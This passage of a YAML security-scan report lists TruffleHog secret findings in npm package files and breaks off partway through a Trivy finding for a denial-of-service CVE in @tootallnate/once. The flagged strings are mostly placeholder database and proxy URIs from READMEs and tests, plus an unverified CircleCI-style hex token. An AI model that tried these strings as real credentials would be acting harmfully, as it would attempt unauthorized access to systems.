|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d5d31157dd10c1ff
|
|
ruleId: Circle
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/ip-address/README.md
|
|
startLine: 0
|
|
message: 7baede7efd3db5f1f25fb439e97d5f695ff76318
|
|
title: Circle secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/ip-address/README.md
|
|
line: 1
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 4
|
|
DetectorName: Circle
|
|
DetectorDescription: CircleCI is a continuous integration and delivery platform
|
|
used to build, test, and deploy software. CircleCI tokens can be used to interact
|
|
with the CircleCI API and access various resources and functionalities.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: 7baede7efd3db5f1f25fb439e97d5f695ff76318
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
Version: '1'
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7196c7e679641da3
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/prisma/build/index.js
|
|
startLine: 0
|
|
message: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/prisma/build/index.js
|
|
line: 1568
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup _mongodb._tcp.cluster0.ab1cd.mongodb.net on 192.168.65.7:53:
|
|
no such host'
|
|
VerificationFromCache: false
|
|
Raw: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f4471d3670e3b099
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/keyv/README.md
|
|
startLine: 0
|
|
message: mongodb://user:pass@localhost:27017/dbname
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/keyv/README.md
|
|
line: 58
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: context deadline exceeded
|
|
VerificationFromCache: false
|
|
Raw: mongodb://user:pass@localhost:27017/dbname
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d837ea8fcf1f8062
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/websocket-driver/README.md
|
|
startLine: 0
|
|
message: http://username:password@proxy.example.com
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/websocket-driver/README.md
|
|
line: 177
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host'
|
|
VerificationFromCache: true
|
|
Raw: http://username:password@proxy.example.com
|
|
RawV2: http://username:password@proxy.example.com
|
|
Redacted: http://username:********@proxy.example.com
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0a6439395ad23821
|
|
ruleId: URI
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts
|
|
startLine: 0
|
|
message: https://anonymous:flabada@developer.mozilla.org
|
|
title: URI secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts
|
|
line: 307
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 17
|
|
DetectorName: URI
|
|
DetectorDescription: This detector identifies URLs with embedded credentials,
|
|
which can be used to access web resources without explicit user interaction.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: https://anonymous:flabada@developer.mozilla.org
|
|
RawV2: https://anonymous:flabada@developer.mozilla.org/en
|
|
Redacted: https://anonymous:********@developer.mozilla.org/en
|
|
ExtraData: null
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1dff4f66e83b2b09
|
|
ruleId: Postgres
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/is-url/test/index.js
|
|
startLine: 0
|
|
message: postgres://u:p@example.com:5702
|
|
title: Postgres secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/is-url/test/index.js
|
|
line: 68
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 968
|
|
DetectorName: Postgres
|
|
DetectorDescription: Postgres connection string containing credentials
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: i/o timeout
|
|
VerificationFromCache: false
|
|
Raw: postgres://u:p@example.com:5702
|
|
RawV2: postgres://u:p@example.com:5702
|
|
Redacted: ''
|
|
ExtraData:
|
|
sslmode: <unset>
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 849f8848e4b2049c
|
|
ruleId: GitHubOauth2
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md
|
|
startLine: 0
|
|
message: showCompletionScript
|
|
title: GitHubOauth2 secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md
|
|
line: 164
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 924
|
|
DetectorName: GitHubOauth2
|
|
DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize
|
|
applications to access GitHub's API on behalf of a user or organization. These
|
|
credentials include a client ID and client secret, which can be used to obtain
|
|
access tokens for accessing GitHub resources.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationFromCache: false
|
|
Raw: showCompletionScript
|
|
RawV2: showCompletionScript027a6365b737e13116811a8ef43670196e1fa00a
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/github/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9afc5113c741a56f
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
startLine: 0
|
|
message: mongodb://username:password@host:1234
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
line: 644
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: context deadline exceeded
|
|
VerificationFromCache: false
|
|
Raw: mongodb://username:password@host:1234
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 917b9a33e85655cd
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
startLine: 0
|
|
message: mongodb://username:password@host:1234/defaultauthdb
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
line: 646
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: context deadline exceeded
|
|
VerificationFromCache: false
|
|
Raw: mongodb://username:password@host:1234/defaultauthdb
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 31f0bf34095c5b38
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
startLine: 0
|
|
message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
line: 647
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: context deadline exceeded
|
|
VerificationFromCache: false
|
|
Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1dda63967d05f07b
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
startLine: 0
|
|
message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
line: 649
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: context deadline exceeded
|
|
VerificationFromCache: false
|
|
Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9491b5fd54f57cb2
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
startLine: 0
|
|
message: mongodb://username:password@host:1234/?authSource=admin
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
line: 651
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: context deadline exceeded
|
|
VerificationFromCache: false
|
|
Raw: mongodb://username:password@host:1234/?authSource=admin
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f911dc46b3477b87
|
|
ruleId: MongoDB
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trufflehog
|
|
version: unknown
|
|
location:
|
|
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
startLine: 0
|
|
message: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000
|
|
title: MongoDB secret
|
|
description: Potential secret detected by TruffleHog
|
|
remediation: Rotate credentials and purge from history.
|
|
references: []
|
|
tags:
|
|
- secrets
|
|
- unverified
|
|
risk:
|
|
cwe:
|
|
- CWE-798
|
|
confidence: MEDIUM
|
|
likelihood: HIGH
|
|
impact: HIGH
|
|
raw:
|
|
SourceMetadata:
|
|
Data:
|
|
Filesystem:
|
|
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
|
|
line: 652
|
|
SourceID: 1
|
|
SourceType: 15
|
|
SourceName: trufflehog - filesystem
|
|
DetectorType: 895
|
|
DetectorName: MongoDB
|
|
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
|
|
data model. MongoDB credentials can be used to access and manipulate the database.
|
|
DecoderName: PLAIN
|
|
Verified: false
|
|
VerificationError: context deadline exceeded
|
|
VerificationFromCache: false
|
|
Raw: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000
|
|
RawV2: ''
|
|
Redacted: ''
|
|
ExtraData:
|
|
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
|
|
StructuredData: null
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A02:2021
|
|
cweTop25_2024:
|
|
- id: CWE-798
|
|
rank: 18
|
|
category: Credentials
|
|
cisControlsV8_1: *id001
|
|
nistCsf2_0:
|
|
- *id002
|
|
- *id003
|
|
pciDss4_0:
|
|
- *id004
|
|
- *id005
|
|
mitreAttack:
|
|
- *id006
|
|
- *id007
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7e52e475110f77c7
|
|
ruleId: CVE-2026-3449
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect
|
|
control flow scoping with AbortSignal'
|
|
title: CVE-2026-3449
|
|
description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable
|
|
to Incorrect Control Flow Scoping in promise resolving when AbortSignal option
|
|
is used. The Promise remains in a permanently pending state after the signal is
|
|
aborted, causing any await or .then() usage to hang indefinitely. This can cause
|
|
a control-flow leak that can lead to stalled requests, blocked workers, or degraded
|
|
application availability.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-3449
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:@tootallnate/once@2.0.0
|
|
risk:
|
|
cwe: &id008
|
|
- CWE-705
|
|
raw:
|
|
VulnerabilityID: CVE-2026-3449
|
|
VendorIDs:
|
|
- GHSA-vpq2-c234-7xj6
|
|
PkgID: '@tootallnate/once@2.0.0'
|
|
PkgName: '@tootallnate/once'
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/%40tootallnate/once@2.0.0
|
|
UID: 22f57853d23edc3a
|
|
InstalledVersion: 2.0.0
|
|
FixedVersion: 3.0.1
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3449
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109
|
|
Title: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect
|
|
control flow scoping with AbortSignal'
|
|
Description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable
|
|
to Incorrect Control Flow Scoping in promise resolving when AbortSignal option
|
|
is used. The Promise remains in a permanently pending state after the signal
|
|
is aborted, causing any await or .then() usage to hang indefinitely. This can
|
|
cause a control-flow leak that can lead to stalled requests, blocked workers,
